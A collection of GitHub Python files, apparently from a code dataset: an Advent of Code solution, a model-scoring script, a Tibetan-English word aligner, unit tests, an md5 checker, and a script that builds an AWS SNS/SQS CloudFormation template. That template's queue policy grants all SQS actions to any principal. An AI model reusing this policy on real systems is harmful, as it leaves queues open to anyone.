prereq_index[prereq]['length'] = string.ascii_uppercase.index(prereq) + 1 + time_const\n prereq_index[prereq]['done'] = 0\n\n if focal_step in prereq_index:\n prereq_index[focal_step]['prereqs'].add(prereq)\n else:\n prereq_index[focal_step] = {}\n prereq_index[focal_step]['prereqs'] = set([prereq])\n prereq_index[focal_step]['length'] = string.ascii_uppercase.index(focal_step) + 1 + time_const\n prereq_index[focal_step]['done'] = 0\n\n completed = set()\n\n # How many steps are there?\n jobs = len(prereq_index)\n time_taken = 0\n\n # What are we working on?\n worker_status = [''] * num_workers\n\n while len(completed) < jobs:\n # Which steps are ready?\n candidates = []\n for focal_step in prereq_index:\n if len(prereq_index[focal_step]['prereqs'] - completed) == 0:\n candidates.append(focal_step)\n\n # Which steps are in progress?\n candidates.sort()\n for ongoing_job in worker_status:\n if ongoing_job is not '':\n candidates.remove(ongoing_job)\n\n # Make each elf do their step\n for i in range(num_workers):\n if worker_status[i] is not '':\n to_do = worker_status[i]\n prereq_index[to_do]['done'] += 1\n if prereq_index[to_do]['done'] >= prereq_index[to_do]['length']:\n completed.add(to_do)\n del prereq_index[to_do]\n worker_status[i] = ''\n elif len(candidates) > 0:\n to_do = candidates.pop(0)\n prereq_index[to_do]['done'] += 1\n if prereq_index[to_do]['done'] >= prereq_index[to_do]['length']:\n completed.add(to_do)\n del prereq_index[to_do]\n else:\n worker_status[i] = to_do\n\n time_taken += 1\n\n print(time_taken)\n","repo_name":"tkkuehn/aoc2018","sub_path":"day07/day7_2.py","file_name":"day7_2.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38748275228","text":"import pickle\n\ninput_file = 'model1.bin'\nwith open(input_file, 'rb') as f_in:\n model = pickle.load(f_in)\ninput_file = 'dv.bin'\nwith open(input_file, 'rb') as f_in:\n dv = pickle.load(f_in)\n\ncustomer = {\"contract\": \"two_year\", \"tenure\": 12, \"monthlycharges\": 19.7}\nX = dv.transform([customer])\ny_prediction = model.predict_proba(X)[0, 1]\nprint(y_prediction)","repo_name":"nicepeopleproject/ML","sub_path":"Week5Homework/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5532714747","text":"import glob\nimport json\nimport os\nimport string\nimport subprocess\nfrom collections import Counter\nfrom typing import Dict\n\nfrom botok import TSEK\n\nfrom word_aligner.data_processor import (\n clean_english_text,\n clean_tibetan_text,\n filter_for_english_dictionary_words,\n filter_for_tibetan_dictionary_words,\n)\nfrom word_aligner.tibetan_words_combiner import (\n load_tibetan_word_dictionary,\n merge_tibetan_compound_words,\n)\nfrom word_aligner.word_tokenizer import (\n load_botok_word_tokenizer,\n load_spacy_word_tokenizer,\n tokenize_english_with_named_entities,\n tokenize_english_with_spacy,\n tokenize_tibetan_with_botok,\n)\n\n\ndef tokenize_and_merge_files(\n split_affix=True,\n tibetan_lemma=False,\n combine_tibetan_compound_words=False,\n english_lemma=False,\n combine_english_compound_words=False,\n num_files_to_train=1,\n):\n # Paths\n data_dir = \"data\"\n input_dir = os.path.join(data_dir, \"input\")\n english_out_file = os.path.join(data_dir, \"english.txt\")\n tibetan_out_file = os.path.join(data_dir, \"tibetan.txt\")\n\n botok_tokenizer_obj = load_botok_word_tokenizer()\n spacy_tokenizer_obj = load_spacy_word_tokenizer()\n TIBETAN_WORD_DICTIONARY = load_tibetan_word_dictionary()\n\n # Updated merging code with tokenization and ensuring non-empty pairs\n with open(english_out_file, \"w\", encoding=\"utf-8\") as english_out, open(\n tibetan_out_file, \"w\", encoding=\"utf-8\"\n ) as tibetan_out:\n for subdir in os.listdir(input_dir):\n\n full_subdir_path = os.path.join(input_dir, subdir)\n if os.path.isdir(full_subdir_path):\n files_in_subdir = os.listdir(full_subdir_path)\n english_files = [f for f in files_in_subdir if f.endswith(\"-en.txt\")]\n tibetan_files = [f for f in files_in_subdir if f.endswith(\"-bo.txt\")]\n\n english_files = sorted(english_files)\n tibetan_files = sorted(tibetan_files)\n\n if len(english_files) != len(tibetan_files):\n print(\n f\"Warning: Mismatch in number of files in {full_subdir_path}. Skipping this folder.\"\n )\n continue\n\n file_count = 1\n for english_file, tibetan_file in zip(\n sorted(english_files), sorted(tibetan_files)\n ):\n with open(\n os.path.join(full_subdir_path, english_file), encoding=\"utf-8\"\n ) as eng, open(\n os.path.join(full_subdir_path, tibetan_file), encoding=\"utf-8\"\n ) as bo:\n en_lines = eng.readlines()\n bo_lines = bo.readlines()\n if len(en_lines) != len(bo_lines):\n continue\n print(f\"Tokenizing file [{file_count}/{num_files_to_train}]\")\n tokenized_english_lines = \"\"\n tokenized_tibetan_lines = \"\"\n for en_line, bo_line in zip(en_lines, bo_lines):\n if combine_english_compound_words:\n en_line = tokenize_english_with_named_entities(\n spacy_tokenizer_obj,\n clean_english_text(en_line),\n english_lemma,\n )\n else:\n en_line = tokenize_english_with_spacy(\n spacy_tokenizer_obj,\n clean_english_text(en_line),\n english_lemma,\n )\n bo_line = tokenize_tibetan_with_botok(\n botok_tokenizer_obj,\n clean_tibetan_text(bo_line),\n split_affix,\n tibetan_lemma,\n )\n if combine_tibetan_compound_words:\n bo_line = merge_tibetan_compound_words(\n TIBETAN_WORD_DICTIONARY, bo_line\n )\n\n if en_line and bo_line:\n tokenized_english_lines += en_line + \"\\n\"\n tokenized_tibetan_lines += bo_line + \"\\n\"\n\n english_out.write(tokenized_english_lines)\n tibetan_out.write(tokenized_tibetan_lines)\n if file_count >= num_files_to_train:\n break\n file_count += 1\n\n print(f\"Data merged into {english_out_file} and {tibetan_out_file}.\")\n\n\n# Function to read vcb files and return a dictionary\ndef read_vcb(vcb_file): # noqa\n vocabulary = {}\n with open(vcb_file, encoding=\"utf-8\") as f:\n for line in f:\n parts = line.strip().split()\n index = int(parts[0])\n word = parts[1]\n vocabulary[index] = word\n return vocabulary\n\n\ndef group_consecutive_indices(indices):\n \"\"\"Group consecutive indices.\"\"\"\n if not indices:\n return []\n\n groups = []\n current_group = [indices[0]]\n\n for i in range(1, len(indices)):\n if indices[i] == indices[i - 1] + 1:\n current_group.append(indices[i])\n else:\n groups.append(current_group)\n current_group = [indices[i]]\n groups.append(current_group)\n\n return groups\n\n\ndef execute_mgiza(threshold_frequency=1, is_source_file_english=True):\n\n # Set paths\n data_dir = \"data\"\n source_path = os.path.join(data_dir, \"english\")\n target_path = os.path.join(data_dir, \"tibetan\")\n\n if not is_source_file_english:\n source_path = os.path.join(data_dir, \"tibetan\")\n target_path = os.path.join(data_dir, \"english\")\n\n out_file = os.path.join(data_dir, \"aligned_words.txt\")\n\n # Convert plain text data to the snt format expected by mgiza++\n subprocess.run([\"plain2snt\", source_path + \".txt\", target_path + \".txt\"])\n\n # Set paths for co-occurrence files\n cooc_file_source_target = os.path.join(data_dir, \"source-target.cooc\")\n cooc_file_target_source = os.path.join(data_dir, \"target-source.cooc\")\n\n # Generate co-occurrence files using snt2cooc\n subprocess.run(\n [\n \"snt2cooc\",\n cooc_file_source_target,\n source_path + \".vcb\",\n target_path + \".vcb\",\n source_path + \"_\" + target_path.split(\"/\")[-1] + \".snt\",\n ]\n )\n subprocess.run(\n [\n \"snt2cooc\",\n cooc_file_target_source,\n target_path + \".vcb\",\n source_path + \".vcb\",\n target_path + \"_\" + source_path.split(\"/\")[-1] + \".snt\",\n ]\n )\n\n # Run mgiza with co-occurrence files\n subprocess.run(\n [\n \"mgiza\",\n \"-S\",\n source_path + \".vcb\",\n \"-T\",\n target_path + \".vcb\",\n \"-C\",\n source_path + \"_\" + target_path.split(\"/\")[-1] + \".snt\",\n \"-o\",\n os.path.join(data_dir, \"alignment\"),\n \"-CoocurrenceFile\",\n cooc_file_source_target,\n ]\n )\n\n # Read vocabularies\n src_vocabulary = read_vcb(source_path + \".vcb\")\n tgt_vocabulary = read_vcb(target_path + \".vcb\")\n\n # Check that vocabularies are correctly read\n print(f\"First 5 source vocab entries: {list(src_vocabulary.items())[:5]}\")\n print(f\"First 5 target vocab entries: {list(tgt_vocabulary.items())[:5]}\")\n\n # Define the word_alignments dictionary\n word_alignments: Dict = {} # noqa\n\n # Extract word alignments from the alignment files\n alignment_files = glob.glob(os.path.join(data_dir, \"alignment.A3.final.part*\"))\n print(f\"Found {len(alignment_files)} alignment files.\")\n\n # Loop over alignment files\n for alignment_file in alignment_files:\n print(f\"Processing {alignment_file}\")\n with open(alignment_file, encoding=\"utf-8\") as af:\n lines = af.readlines()\n for i in range(1, len(lines), 3):\n source_tokens = lines[i].strip().split()\n\n # Extract the part of the line that contains the alignments\n alignment_info = lines[i + 1].strip().split(\"NULL\")[1]\n\n # Split the line based on closing brace to get individual alignments\n alignments = alignment_info.split(\"}\")\n for align in alignments:\n if \"{\" not in align:\n continue\n target_word = align.split(\"{\")[0].strip().strip(string.punctuation)\n indices = [int(idx) for idx in align.split(\"{\")[1].split()]\n\n grouped_indices = group_consecutive_indices(indices)\n # join words formed by word alignment with '*' sign\n grouped_source_words = [\n \"*\".join(source_tokens[idx - 1] for idx in group)\n for group in grouped_indices\n ]\n\n if target_word not in word_alignments:\n word_alignments[target_word] = []\n word_alignments[target_word].extend(grouped_source_words)\n\n # Debug print to check how many alignments have been captured after processing each file\n print(\n f\"Number of alignments captured after processing {alignment_file}: {len(word_alignments)}\"\n )\n\n # Cleaning the words before writing to file\n\n if is_source_file_english:\n word_alignments = {\n filter_for_english_dictionary_words(word): [\n filter_for_tibetan_dictionary_words(phrase)\n for phrase in phrases\n if filter_for_tibetan_dictionary_words(phrase) != \"\"\n ]\n for word, phrases in word_alignments.items()\n if filter_for_english_dictionary_words(word) != \"\"\n }\n # Add tsek to the end of tibetan words for key\n word_alignments = {\n word: [\n phrase if phrase.endswith(TSEK) else phrase + TSEK for phrase in phrases\n ]\n for word, phrases in word_alignments.items()\n }\n\n else:\n word_alignments = {\n filter_for_tibetan_dictionary_words(word): [\n filter_for_english_dictionary_words(phrase)\n for phrase in phrases\n if filter_for_english_dictionary_words(phrase) != \"\"\n ]\n for word, phrases in word_alignments.items()\n if filter_for_tibetan_dictionary_words(word) != \"\"\n }\n # Add tsek to the end of tibetan words for key\n keys_to_remove = []\n newly_added_word_alignment = {}\n for tibetan_word in word_alignments.keys():\n if not tibetan_word.endswith(TSEK):\n keys_to_remove.append(tibetan_word)\n tibetan_word_with_tsek = tibetan_word + TSEK\n if tibetan_word_with_tsek in word_alignments:\n word_alignments[tibetan_word_with_tsek].extend(\n word_alignments[tibetan_word]\n )\n\n else:\n newly_added_word_alignment[\n tibetan_word_with_tsek\n ] = word_alignments[tibetan_word]\n # Remove the old keys\n for key in keys_to_remove:\n del word_alignments[key]\n word_alignments.update(newly_added_word_alignment)\n\n # Process word alignments to get unique strings with frequencies and order them\n filtered_word_alignments = {}\n filtered_word_alignments_json = {}\n for target_word, source_phrases in word_alignments.items():\n counter = Counter(source_phrases)\n\n # Filter phrases based on the threshold\n filtered_phrases = {\n phrase: count\n for phrase, count in counter.items()\n if count >= threshold_frequency\n }\n\n if not filtered_phrases:\n continue\n ordered_phrases = sorted(\n filtered_phrases.items(), key=lambda x: x[1], reverse=True\n )\n filtered_word_alignments[target_word] = [\n f\"{phrase}_{count}\" for phrase, count in ordered_phrases\n ]\n filtered_word_alignments_json[target_word] = [\n {\n \"translation\": phrase.replace(\"*\", \" \").replace(\"+\", \" \"),\n \"frequency\": count,\n }\n for phrase, count in ordered_phrases\n ]\n\n filtered_word_alignments_sorted_keys = sorted(\n k.replace(\"+\", \" \") for k in filtered_word_alignments_json.keys()\n )\n filtered_word_alignments_json = {\n new_key: filtered_word_alignments_json[old_key]\n for new_key, old_key in zip(\n filtered_word_alignments_sorted_keys,\n sorted(filtered_word_alignments_json.keys()),\n )\n }\n json_file_path = os.path.join(data_dir, \"aligned_words.json\")\n\n # Writing the dictionary to a JSON file\n with open(json_file_path, \"w\", encoding=\"utf-8\") as json_file:\n # The `indent` parameter is optional, used for pretty-printing\n json.dump(\n filtered_word_alignments_json, json_file, ensure_ascii=False, indent=4\n )\n\n print(f\"Data has been written to {json_file_path}\")\n # Write results to output file\n print(\"Writing to aligned_words.txt...\")\n with open(out_file, \"w\", encoding=\"utf-8\") as out:\n for target_word in sorted(filtered_word_alignments.keys()):\n source_words = \", \".join(filtered_word_alignments[target_word])\n out.write(f\"{target_word}: {source_words}\\n\")\n\n print(\"Writing complete.\")\n print(f\"Word alignments saved to {out_file}\")\n\n\nif __name__ == \"__main__\":\n tokenize_and_merge_files()\n execute_mgiza()\n","repo_name":"OpenPecha/word-aligner","sub_path":"src/word_aligner/mgiza_word_aligner.py","file_name":"mgiza_word_aligner.py","file_ext":"py","file_size_in_byte":14023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13253173370","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ntest_python.py\n\nTest suite for zcomx/modules/python.py\n\"\"\"\nimport unittest\nfrom applications.zcomx.modules.python import (\n List,\n from_dict_by_keys,\n)\nfrom applications.zcomx.modules.tests.runner import LocalTestCase\n# pylint: disable=missing-docstring\n\n\nclass TestList(LocalTestCase):\n\n def test_parent____init__(self):\n integers = List([1, 2, 3])\n self.assertEqual(len(integers), 3)\n\n def test__reshape(self):\n integers = List(list(range(0, 10)))\n self.assertEqual(len(integers), 10)\n\n tests = [\n # (shape, expect)\n ((2, 5), [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]),\n ((None, None), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]),\n ((None, 5), [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]),\n ((None, 3), [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]),\n ((2, None), [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]),\n ((3, None), [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]]),\n ((2, 4), [[0, 1, 2, 3], [4, 5, 6, 7]]),\n ((1, 5), [[0, 1, 2, 3, 4]]),\n ((3, 5), [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]),\n ((2, 6), [[0, 1, 2, 3, 4, 5], [6, 7, 8, 9]]),\n ]\n\n for t in tests:\n self.assertEqual(integers.reshape(t[0]), t[1])\n\n\nclass TestFunctions(LocalTestCase):\n\n def test__from_dict_by_keys(self):\n data = {\n 'a': {\n 'aa': {\n 'aaa': 111,\n 'aab': 112,\n },\n 'ab': {\n 'aba': 121,\n 'abb': 122,\n },\n },\n 'b': {\n 'ba': {\n 'baa': 211,\n 'bab': 212,\n },\n 'bb': {\n 'bba': 221,\n 'bbb': 222,\n },\n },\n }\n\n tests = [\n # (map_list, expect)\n ([], data),\n (\n ['a'],\n {\n 'aa': {'aaa': 111, 'aab': 112},\n 'ab': {'aba': 121, 'abb': 122},\n }\n ),\n (['a', 'aa'], {'aaa': 111, 'aab': 112}),\n (['a', 'aa', 'aaa'], 111),\n (['b', 'bb', 'bbb'], 222),\n (['c'], KeyError),\n (['a', 'ac'], KeyError),\n (['a', 'aa', 'aac'], KeyError),\n ]\n for t in tests:\n if t[1] == KeyError:\n self.assertRaises(\n t[1], from_dict_by_keys, data, t[0])\n else:\n self.assertEqual(\n from_dict_by_keys(data, t[0]),\n t[1]\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zcomx/zco.mx","sub_path":"applications/zcomx/tests/test_python.py","file_name":"test_python.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11630535700","text":"# !/usr/bin/python3\nimport sys\nimport boto3\nimport json\nimport botocore\nimport re\nfrom botocore.exceptions import ClientError\n\ntry:\n Environment = sys.argv[1]\n QueueName = sys.argv[2]\n DeadLetterQueueName = sys.argv[3]\n MaxReceiveCount = sys.argv[4]\n LOB = sys.argv[5]\n REF_ID = sys.argv[6] # For the parameter JIRA_ID\n ApplicationName = sys.argv[7]\n SNSTopicName = sys.argv[8]\n SNSSubscriptionRequired = sys.argv[9]\n QueueType = sys.argv[10]\n # If QueueType is FIFO, then set QueueType to true else false\n if QueueType == \"FIFO\":\n QueueType = True\n else:\n QueueType = False\n VisibilityTimeout = sys.argv[11]\n MessageRetentionPeriod = sys.argv[12]\n MaximumMessageSize = sys.argv[13]\n DelaySeconds = sys.argv[14]\n ReceiveMessageWaitTimeSeconds = sys.argv[15]\n RawMessageDelivery = sys.argv[16]\n Stackname = sys.argv[17]\nexcept IndexError:\n print(\"Please provide all the required arguments: Environment, QueueName, DeadLetterQueueName, MaxReceiveCount, LOB, REF_ID, ApplicationName, SNSTopicName, SNSSubscriptionRequired, QueueType, VisibilityTimeout, MessageRetentionPeriod, MaximumMessageSize, DelaySeconds,RawMessageDelivery, Stackname\")\n sys.exit(1)\n\nprint(f\"Environment: {Environment}\")\nprint(f\"QueueName: {QueueName}\")\nprint(f\"DeadLetterQueueName: {DeadLetterQueueName}\")\nprint(f\"MaxReceiveCount: {MaxReceiveCount}\")\nprint(f\"LOB: {LOB}\")\nprint(f\"REF_ID: {REF_ID}\")\nprint(f\"ApplicationName: {ApplicationName}\")\nprint(f\"SNSTopicName: {SNSTopicName}\")\nprint(f\"SNSSubscriptionRequired: {SNSSubscriptionRequired}\")\nprint(f\"QueueType: {QueueType}\")\nprint(f\"VisibilityTimeout: {VisibilityTimeout}\")\nprint(f\"MessageRetentionPeriod: {MessageRetentionPeriod}\")\nprint(f\"MaximumMessageSize: {MaximumMessageSize}\")\nprint(f\"DelaySeconds: {DelaySeconds}\")\nprint(f\"ReceiveMessageWaitTimeSeconds: {ReceiveMessageWaitTimeSeconds}\")\nprint(f\"RawMessageDelivery: {RawMessageDelivery}\")\nprint(f\"Stackname: {Stackname}\")\n\n# Now we create the CloudFormation stack\ncloudformation = boto3.client('cloudformation')\n\n# Print list of stacks containing SNS-SQS in the name\ntry:\n for stack in cloudformation.list_stacks()['StackSummaries']:\n if \"SNS-SQS\" in stack['StackName']:\n print(stack['StackName'])\nexcept KeyError:\n print(\"No stacks found with SNS-SQS in the name\")\n pass\n\n# Get the template using the stack name\ntry:\n template_cft = cloudformation.get_template(StackName=Stackname)\nexcept botocore.exceptions.ClientError as e:\n print(e.response['Error']['Message'])\n pass\n\n# Get the Resources section of the template\ntry:\n template = dict(template_cft['TemplateBody'])\n # print(template)\n \nexcept Exception:\n template = {\n \"AWSTemplateFormatVersion\": \"2010-09-09\",\n \"Description\": \"Template for creating SNS Topic and SQS Queue\",\n \"Parameters\": {},\n \"Mappings\": {},\n \"Conditions\": {},\n \"Resources\": {}\n }\n # print(template['Resources'])\n\n# Find the largest number in the SQSQUEUE resource name\n\n# numlist = []\n# for resource in template['Resources']:\n# num = re.findall(r'\\d+', resource)\n# if num:\n# numlist.append(num)\n# try:\n# if len(DeadLetterQueueName) == 0:\n# count = int(max(numlist)[0]) + 1\n# else:\n# count = int(max(numlist)[0]) + 2\n# except ValueError:\n# count = 1\n\nsqsQueueCount = 0\nsnsTopicCount = 0\n\n# Find the number following \"SQSQUEUE\" and \"SNSTOPIC\" uder Resources\nfor resource in template['Resources']:\n if \"SQSQUEUE\" in resource:\n # Find the number following \"SQSQUEUE\"\n sqsQueueCount = int(re.findall(r'\\d+', resource)[0])\n if \"SNSTOPIC\" in resource:\n # Find the number following \"SNSTOPIC\"\n snsTopicCount = int(re.findall(r'\\d+', resource)[0])\n\nsqsQueueCount += 2\nsnsTopicCount += 1\nprint(f\"SQSQUEUE count: {sqsQueueCount}\")\nprint(f\"SNSTOPIC count: {snsTopicCount}\")\n\nresources_source_queue = {}\nresources_dead_letter_queue = {}\nresources_queue_policy = {}\nresources_sns_topic = {}\nresources_sns_subscription = {}\n\nsqs = boto3.client('sqs')\nsns = boto3.client('sns')\nqueue_arn = None\n\n# If Queue already exists, then we print the Queue URL and exit\ntry:\n for url in sqs.list_queues()['QueueUrls']:\n # Need to check if the exact QueueName exists\n if QueueName == url.split('/')[-1]:\n queue_attributes = sqs.get_queue_attributes(\n QueueUrl=url,\n AttributeNames=['QueueArn']\n )\n queue_arn = queue_attributes['Attributes']['QueueArn']\n print(f\"Queue already exists!\")\n print(f\"Queue URL: {url}\")\n print(f\"Queue ARN: {queue_arn}\")\n sys.exit(0)\nexcept KeyError:\n print(\"Queue does not exist. Creating Queue...\")\n pass\n\nsnsList = []\nif SNSTopicName != \"\":\n for topic in sns.list_topics()['Topics']:\n snsList.append(topic['TopicArn'].split(':')[-1])\n\nfor resource in template['Resources']:\n if \"SNSTOPIC\" in resource:\n if template['Resources'][f\"{resource}\"][\"Properties\"]['TopicName']==SNSTopicName:\n existing_SNSTOPIC = resource\n\nif SNSTopicName != \"\" and SNSSubscriptionRequired == \"True\":\n if SNSTopicName in snsList:\n print(f\"SNS Topic already exists!\")\n resources_sns_subscription = {\n f\"SNSSUBSCRIPTION{snsTopicCount}SQSQUEUE{sqsQueueCount}\": {\n \"Type\": \"AWS::SNS::Subscription\",\n \"Properties\": {\n \"TopicArn\": {\n \"Ref\": existing_SNSTOPIC\n },\n \"Endpoint\": {\n \"Fn::GetAtt\": [\n f\"SQSQUEUE{sqsQueueCount}\",\n \"Arn\"\n ]\n },\n \"Protocol\": \"sqs\",\n \"RawMessageDelivery\": RawMessageDelivery\n }\n }\n }\n\n else:\n print(f\"Creating SNS Topic and Subscription...\")\n resources_sns_topic = {\n f\"SNSTOPIC{snsTopicCount}\": {\n \"Type\": \"AWS::SNS::Topic\",\n \"Properties\": {\n \"TopicName\": SNSTopicName,\n \"Tags\": [\n {\n \"Key\": \"LOB\",\n \"Value\": LOB\n },\n {\n \"Key\": \"REF_ID\",\n \"Value\": REF_ID\n },\n {\n \"Key\": \"Application Name\",\n \"Value\": ApplicationName\n }\n ]\n }\n }\n }\n\n resources_sns_subscription = {\n f\"SNSSUBSCRIPTION{snsTopicCount}SQSQUEUE{sqsQueueCount}\": {\n \"Type\": \"AWS::SNS::Subscription\",\n \"Properties\": {\n \"TopicArn\": {\n \"Ref\": f\"SNSTOPIC{snsTopicCount}\"\n },\n \"Endpoint\": {\n \"Fn::GetAtt\": [\n f\"SQSQUEUE{sqsQueueCount}\",\n \"Arn\"\n ]\n },\n \"Protocol\": \"sqs\",\n \"RawMessageDelivery\": RawMessageDelivery\n }\n }\n }\n\nelif SNSTopicName != \"\" and SNSSubscriptionRequired == \"False\":\n if SNSTopicName in snsList:\n print(f\"SNS Topic already exists!\")\n resources_sns_subscription = None\n resources_sns_topic = None\n pass\n else:\n print(f\"Creating SNS Topic...\")\n resources_sns_topic = {\n f\"SNSTOPIC{snsTopicCount}\": {\n \"Type\": \"AWS::SNS::Topic\",\n \"Properties\": {\n \"TopicName\": SNSTopicName,\n \"Tags\": [\n {\n \"Key\": \"LOB\",\n \"Value\": LOB\n },\n {\n \"Key\": \"REF_ID\",\n \"Value\": REF_ID\n },\n {\n \"Key\": \"Application Name\",\n \"Value\": ApplicationName\n }\n ]\n }\n }\n }\n resources_sns_subscription = None\n\nelse:\n resources_sns_topic = None\n resources_sns_subscription = None\n\nif len(DeadLetterQueueName) != 0:\n resources_dead_letter_queue = {\n f\"SQSQUEUE{sqsQueueCount-1}\": {\n \"Type\": \"AWS::SQS::Queue\",\n \"Properties\": {\n \"QueueName\": DeadLetterQueueName\n }\n }\n }\nelse:\n resources_dead_letter_queue = None\n\nif QueueName != \"\" and len(DeadLetterQueueName) != 0:\n # print(\"Both QueueName and DeadLetterQueueName are provided\")\n resources_source_queue = {\n f\"SQSQUEUE{sqsQueueCount}\": {\n \"Type\": \"AWS::SQS::Queue\",\n \"DependsOn\": f\"SQSQUEUE{sqsQueueCount-1}\",\n \"Properties\": {\n \"QueueName\": QueueName,\n # \"FifoQueue\": QueueType,\n \"VisibilityTimeout\" : VisibilityTimeout,\n \"DelaySeconds\": DelaySeconds,\n \"MessageRetentionPeriod\": MessageRetentionPeriod,\n \"MaximumMessageSize\": MaximumMessageSize,\n \"ReceiveMessageWaitTimeSeconds\": ReceiveMessageWaitTimeSeconds,\n \"RedrivePolicy\": {\n \"deadLetterTargetArn\": {\n \"Fn::GetAtt\": [\n f\"SQSQUEUE{sqsQueueCount-1}\",\n \"Arn\"\n ]\n },\n \"maxReceiveCount\": MaxReceiveCount\n },\n \"Tags\": [\n {\n \"Key\": \"LOB\",\n \"Value\": LOB\n },\n { \n \"Key\": \"REF_ID\",\n \"Value\": REF_ID\n },\n {\n \"Key\": \"Application Name\",\n \"Value\": ApplicationName\n }\n ]\n }\n }\n }\n\nelif QueueName != \"\" and len(DeadLetterQueueName) == 0:\n # print(\"Only Source QueueName is provided\")\n resources_source_queue = {\n f\"SQSQUEUE{sqsQueueCount}\": {\n \"Type\": \"AWS::SQS::Queue\",\n \"Properties\": {\n \"QueueName\": QueueName,\n # \"FifoQueue\": QueueType,\n \"VisibilityTimeout\" : VisibilityTimeout,\n \"DelaySeconds\": DelaySeconds,\n \"MessageRetentionPeriod\": MessageRetentionPeriod,\n \"MaximumMessageSize\": MaximumMessageSize,\n \"ReceiveMessageWaitTimeSeconds\": ReceiveMessageWaitTimeSeconds,\n \"Tags\": [\n {\n \"Key\": \"LOB\",\n \"Value\": LOB\n },\n { \n \"Key\": \"REF_ID\",\n \"Value\": REF_ID\n },\n {\n \"Key\": \"Application Name\",\n \"Value\": ApplicationName\n }\n ]\n }\n }\n }\n\nelse:\n resources_source_queue = None\n\nif QueueName != \"\":\n resources_queue_policy = {\n f\"SQSQUEUE{sqsQueueCount}POLICY\": {\n \"Type\": \"AWS::SQS::QueuePolicy\",\n \"Properties\": {\n \"Queues\": [\n {\n \"Ref\": f\"SQSQUEUE{sqsQueueCount}\"\n }\n ],\n \"PolicyDocument\": {\n \"Statement\": [\n {\n \"Action\": \"SQS:*\",\n \"Effect\": \"Allow\",\n \"Principal\": \"*\",\n \"Resource\": {\n \"Fn::GetAtt\": [\n f\"SQSQUEUE{sqsQueueCount}\",\n \"Arn\"\n ]\n }\n }\n ]\n }\n }\n }\n }\nelse:\n resources_queue_policy = None\n\n\nif resources_sns_topic != None:\n template[\"Resources\"].update(resources_sns_topic)\n\nif resources_dead_letter_queue != None:\n template[\"Resources\"].update(resources_dead_letter_queue)\n\nif resources_source_queue != None:\n template[\"Resources\"].update(resources_source_queue)\n\nif resources_queue_policy != None:\n template[\"Resources\"].update(resources_queue_policy)\n\nif resources_sns_subscription != None:\n template[\"Resources\"].update(resources_sns_subscription)\n\nprint(json.dumps(template, indent=4))\n\n# try:\n# update_stack = cloudformation.update_stack(\n# StackName=Stackname,\n# TemplateBody=json.dumps(template, indent=4),\n# )\n# print(f\"Updating the stack {Stackname}\")\n# except botocore.exceptions.ClientError as e:\n# create_stack = cloudformation.create_stack(\n# StackName=Stackname,\n# TemplateBody=json.dumps(template, indent=4),\n# )\n# print(f\"Creating New Stack {Stackname}\")\n","repo_name":"Jks08/AWSLearn","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":13380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11483527370","text":"import hashlib\nimport pdb\nimport time\n\ndef md5(fname, blocksize=65536):\n \"\"\"\n Performs md5 on file\n Parameters\n ----------\n fname : str\n path to the file\n blocksize : int\n 4096 or 65536\n Returns\n -------\n\n \"\"\"\n\n hash_md5 = hashlib.md5()\n with open(fname, \"rb\") as f:\n for chunk in iter(lambda: f.read(blocksize), b\"\"):\n hash_md5.update(chunk)\n\n return hash_md5.hexdigest()\n\n\ndef check_copied_file_identical(original_fpath, copied_fpath, verbose=True):\n \"\"\"\n Checks if two files are identical (and not unintentionally modified through eg. a copy and paste process)\n Parameters\n ----------\n original_fpath : str\n path to the original file\n copied_fpath : str\n path to the new copied file\n\n Returns\n -------\n file_is_identical : bool\n 0 : file is different\n 1 : file is identical\n \"\"\"\n\n if verbose:\n print('Calculating md5 for %s' % original_fpath)\n start_time = time.time()\n original_md5 = md5(original_fpath)\n\n if verbose:\n end_time = time.time()\n print('Elapsed time %.3f' % (end_time - start_time))\n\n if verbose:\n print('Calculating md5 for %s' % copied_fpath)\n start_time = time.time()\n\n copied_md5 = md5(copied_fpath)\n\n if verbose:\n end_time = time.time()\n print('Elapsed time %.3f' % (end_time - start_time))\n\n file_is_identical = (original_md5 == copied_md5)\n\n if verbose:\n if file_is_identical:\n print('Files are identical')\n else:\n print('Files are different')\n\n return file_is_identical\n\n\n\ndef main():\n\n\n original_fpath = '/home/timothysit/Desktop/2022-01-18_6_AV002_frontCam.mj2'\n copied_fpath = '/run/user/1000/gvfs/smb-share:server=zinu.local,share=subjects/AV002/2022-01-18/6/2022-01-18_6_AV002_frontCam.mj2'\n\n file_is_identical = check_copied_file_identical(original_fpath, copied_fpath)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cortex-lab/PinkRigs","sub_path":"Analysis/pyutils/checkFileIntegrity.py","file_name":"checkFileIntegrity.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"4704294278","text":"# -*- coding: utf-8 -*-\n\nimport hashlib\nimport os\nimport shutil\nfrom stat import ST_SIZE, ST_CTIME\n\n\nCHUNKSIZE = 4096\nINNER_ENCODING = 'utf-8'\nREWIND = object()\nCLOSE = object()\n\n\nremove_punctuation_map = dict((\n ord(char), None) for char in '''\\/\\'\\\"*?:;\"<>|'''\n)\n_windows_device_files = (\n 'CON', 'AUX', 'COM1', 'COM2', 'COM3',\n 'COM4', 'LPT1', 'LPT2', 'LPT3', 'PRN', 